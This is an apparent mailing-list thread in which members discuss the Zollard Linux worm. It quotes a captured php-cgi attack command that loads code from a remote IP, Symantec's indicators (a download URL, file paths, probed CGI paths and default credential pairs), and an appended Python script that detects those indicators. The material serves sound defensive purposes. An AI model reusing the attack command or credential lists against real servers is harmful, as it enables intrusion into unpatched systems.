[Lugro-principiantes] New worm affecting GNU/Linux

Omar Arino omar.arino at linuxdojo.com.ar
Wed Dec 4 11:07:54 ART 2013


On 4 December 2013 11:04, Omar Arino <omar.arino at linuxdojo.com.ar> wrote:

>
>
> On 4 December 2013 10:36, Sacanti Ernesto <sacanti.ernesto at gmail.com> wrote:
>
> On 03/12/13 23:50, Martín Carr wrote:
>>
>> 2013/12/3, E S <micta2003 at yahoo.com>:
>>>
>>>> Dear all,
>>>>
>>>> It's not clear to me how this worm could affect me. I have LinuxMint 15
>>>> and I'm a regular user. Are those recommendations for networks?
>>>>
>>>
>>> Unless you use your computer as a web server (to host dynamic pages
>>> written in PHP) and haven't updated it, you don't need to worry.
>>>
>>> Regards!
>>>
>>> I don't know if it's this, but I found this log on my server:
>> /usr/lib/cgi-bin/php -d allow_url_include=on -d safe_mode=off -d
>> suhosin.simulation=on -d disable_functions=\"\" -d open_basedir=none -d
>> auto_prepend_file=http://82.221.102.181/robots.txt -d
>> cgi.force_redirect=0 -d cgi.redirect_status_env=0 -n
>>
>>
Here's some more info:



> *Discovered:* November 26, 2013
> *Updated:* November 28, 2013 12:43:59 AM
> *Type:* Worm
> *Infection Length:* Varies
> *Systems Affected:* Linux
> *CVE References:* CVE-2012-1823 <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1823>,
> CVE-2012-2311 <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2311>,
> CVE-2012-2335 <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2335>,
> CVE-2012-2336 <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2336>
> The worm propagates by exploiting the PHP 'php-cgi' Information
> Disclosure Vulnerability <http://www.securityfocus.com/bid/53388> (CVE-2012-1823)
> through HTTP POST requests.
>
> If the target is vulnerable, it downloads and executes the worm from the
> following URL:
> [http://]www.gpharma.co
>
> When the worm is executed, it copies itself as the following file:
> /tmp/x86
>
> The worm creates the following directory:
> /var/run/.zollard/
>
> The worm attempts to force load ip_table or iptable from the following
> locations:
>
>    - /lib/modules/[OS VERSION]/kernel/net/ipv4/netfilter/ip_tables.ko
>    - /lib/modules/[OS VERSION]/kernel/net/ipv4/netfilter/iptable_filter.ko
>
>
> The worm configures iptable to drop packets on TCP port 23 and prevents
> remote users from connecting to the compromised computer.
>
> The worm attempts to terminate the following process:
> telnetd
>
> The worm attempts to terminate the following processes and delete the
> files:
>
>    - /var/run/.lightpid
>    - /var/run/.aidrapid
>    - /var/run/lightpid
>
>
> The worm deletes the following files:
>
>    - /var/run/.lightscan
>    - /var/run/lightscan
>    - /var/run/mipsel
>    - /var/run/mips
>    - /var/run/sh
>    - /var/run/arm
>    - /var/run/ppc
>    - /var/run/m
>    - /var/run/mi
>    - /var/run/s
>    - /var/run/a
>    - /var/run/p
>    - /var/run/msx
>    - /var/run/mx
>    - /var/run/sx
>    - /var/run/ax
>    - /var/run/px
>    - /var/run/32
>    - /var/run/sel
>    - /var/run/pid
>    - /var/run/gcc
>    - /var/run/dev
>    - /var/run/psx
>    - /var/run/mpl
>    - /var/run/mps
>    - /var/run/sph
>    - /var/run/arml
>    - /var/run/mips.l
>    - /var/run/mipsell
>    - /var/run/ppcl
>    - /var/run/shl
>    - /bin/pp
>    - /bin/mi
>    - /bin/mii
>    - /var/tmp/dreams.install.sh
>    - /var/tmp/ep2.ppc
>    - /usr/bin/wget
>    - /usr/bin/-wget
>
>
> The worm generates random IP addresses excluding the following:
>
>    - 0.0.0.0 - 0.255.255.255
>    - 127.0.0.1 - 127.255.255.255
>    - 192.0.2.0 - 192.0.2.255
>    - 198.51.100.0 - 198.51.100.255
>    - 203.0.113.0 - 203.0.113.255
>    - 255.255.255.255
>
>
> If an IP address is reachable, the worm attempts to access the following
> paths:
>
>    - /cgi-bin/php
>    - /cgi-bin/php5
>    - /cgi-bin/php-cgi
>    - /cgi-bin/php.cgi
>    - /cgi-bin/php4
>
>
> If user authentication is required, the worm attempts the following user
> name and password combinations (user name/password):
>
>    - admin/admin
>    - root/[BLANK]
>    - root/root
>    - admin/1234
>    - admin/12345
>    - root/admin
>    - root/dreambox
>    - admin/smcadmin
>    - admin/[BLANK]
>
>
>
> Recommendations
>
> Symantec Security Response encourages all users and administrators to
> adhere to the following basic security "best practices":
>
>    - Use a firewall to block all incoming connections from the Internet
>    to services that should not be publicly available. By default, you should
>    deny all incoming connections and only allow services you explicitly want
>    to offer to the outside world.
>    - Enforce a password policy. Complex passwords make it difficult to
>    crack password files on compromised computers. This helps to prevent or
>    limit damage when a computer is compromised.
>    - Ensure that programs and users of the computer use the lowest level
>    of privileges necessary to complete a task. When prompted for a root or UAC
>    password, ensure that the program asking for administration-level access is
>    a legitimate application.
>    - Disable AutoPlay to prevent the automatic launching of executable
>    files on network and removable drives, and disconnect the drives when not
>    required. If write access is not required, enable read-only mode if the
>    option is available.
>    - Turn off file sharing if not needed. If file sharing is required,
>    use ACLs and password protection to limit access. Disable anonymous access
>    to shared folders. Grant access only to user accounts with strong passwords
>    to folders that must be shared.
>    - Turn off and remove unnecessary services. By default, many operating
>    systems install auxiliary services that are not critical. These services
>    are avenues of attack. If they are removed, threats have less avenues of
>    attack.
>    - If a threat exploits one or more network services, disable, or block
>    access to, those services until a patch is applied.
>    - Always keep your patch levels up-to-date, especially on computers
>    that host public services and are accessible through the firewall, such as
>    HTTP, FTP, mail, and DNS services.
>    - Configure your email server to block or remove email that contains
>    file attachments that are commonly used to spread threats, such as .vbs,
>    .bat, .exe, .pif and .scr files.
>    - Isolate compromised computers quickly to prevent threats from
>    spreading further. Perform a forensic analysis and restore the computers
>    using trusted media.
>    - Train employees not to open attachments unless they are expecting
>    them. Also, do not execute software that is downloaded from the Internet
>    unless it has been scanned for viruses. Simply visiting a compromised Web
>    site can cause infection if certain browser vulnerabilities are not patched.
>    - If Bluetooth is not required for mobile devices, it should be turned
>    off. If you require its use, ensure that the device's visibility is set to
>    "Hidden" so that it cannot be scanned by other Bluetooth devices. If device
>    pairing must be used, ensure that all devices are set to "Unauthorized",
>    requiring authorization for each connection request. Do not accept
>    applications that are unsigned or sent from unknown sources.
>    - For further information on the terms used in this document, please
>    refer to the Security Response glossary
>    <http://www.symantec.com/business/security_response/glossary.jsp>.
>
> *Writeup By:* Kaoru Hayashi
>
------------ next part ------------
An HTML attachment was scrubbed...
URL: <http://lugro.org.ar/pipermail/lugro-principiantes/attachments/20131204/00cba6a1/attachment-0001.htm>
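A small defensive check, added here and not part of the thread or of Symantec's writeup, that looks for the indicators discussed above: php-cgi processes started with the safety-disabling `-d` overrides seen in Ernesto's log, POST requests to the probed `/cgi-bin/php*` paths in an Apache-style access log, and the worm's `/tmp/x86` and `/var/run/.zollard/` artifacts on disk. The process sample is the line quoted in the thread; the access-log line is constructed.

```python
import os
import re
# php.ini overrides taken from the php-cgi command line quoted in the thread;
# each one switches off a PHP safety control the worm needs disabled.
WEAKENING_OPTS = {
    "allow_url_include=on", "safe_mode=off", "suhosin.simulation=on",
    "disable_functions=", "open_basedir=none", "cgi.force_redirect=0",
    "cgi.redirect_status_env=0",
}
REMOTE_PREPEND = re.compile(r"auto_prepend_file=(?:https?|ftp)://", re.I)
# Filesystem indicators and probed CGI paths from the Symantec writeup above.
FILE_IOCS = ("/tmp/x86", "/var/run/.zollard/")
CGI_PATHS = {"/cgi-bin/php", "/cgi-bin/php5", "/cgi-bin/php-cgi",
             "/cgi-bin/php.cgi", "/cgi-bin/php4"}

def check_process_line(cmdline):
    """Return the safety-weakening -d overrides found in one php command line."""
    if "php" not in cmdline:
        return []
    hits = []
    for opt in re.findall(r"-d\s+(\S+)", cmdline):
        opt = opt.replace("\\", "").replace('"', "")  # \"\" in the log -> empty value
        if opt in WEAKENING_OPTS or REMOTE_PREPEND.match(opt):
            hits.append(opt)
    return hits

def check_access_line(line):
    """Return the request path if a common-log line is a POST to a probed php-cgi path."""
    m = re.search(r'"(POST|GET)\s+(\S+)', line)
    if not m or m.group(1) != "POST":
        return None
    path = m.group(2).split("?", 1)[0]
    return path if path in CGI_PATHS else None

def check_filesystem(exists=os.path.exists):
    """Return the worm's file and directory indicators present on this host."""
    return [p for p in FILE_IOCS if exists(p)]

# Samples: the process line is the one quoted in the thread; the access-log line is constructed.
SAMPLE_PROCESS = ('/usr/lib/cgi-bin/php -d allow_url_include=on -d safe_mode=off -d '
                  'suhosin.simulation=on -d disable_functions=\\"\\" -d open_basedir=none -d '
                  'auto_prepend_file=http://82.221.102.181/robots.txt -d '
                  'cgi.force_redirect=0 -d cgi.redirect_status_env=0 -n')
SAMPLE_ACCESS = '203.0.113.7 - - [04/Dec/2013:10:36:00 -0300] "POST /cgi-bin/php-cgi HTTP/1.1" 200 12'

if __name__ == "__main__":
    print("process:", check_process_line(SAMPLE_PROCESS))
    print("access:", check_access_line(SAMPLE_ACCESS))
    print("files:", check_filesystem())
```

On a live host the process lines would come from `ps -eo args` or auditd execve records and the access lines from the web server's log; any hit on the process or filesystem checks is a strong sign the php-cgi patch was missing.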


More information about the Lugro-principiantes mailing list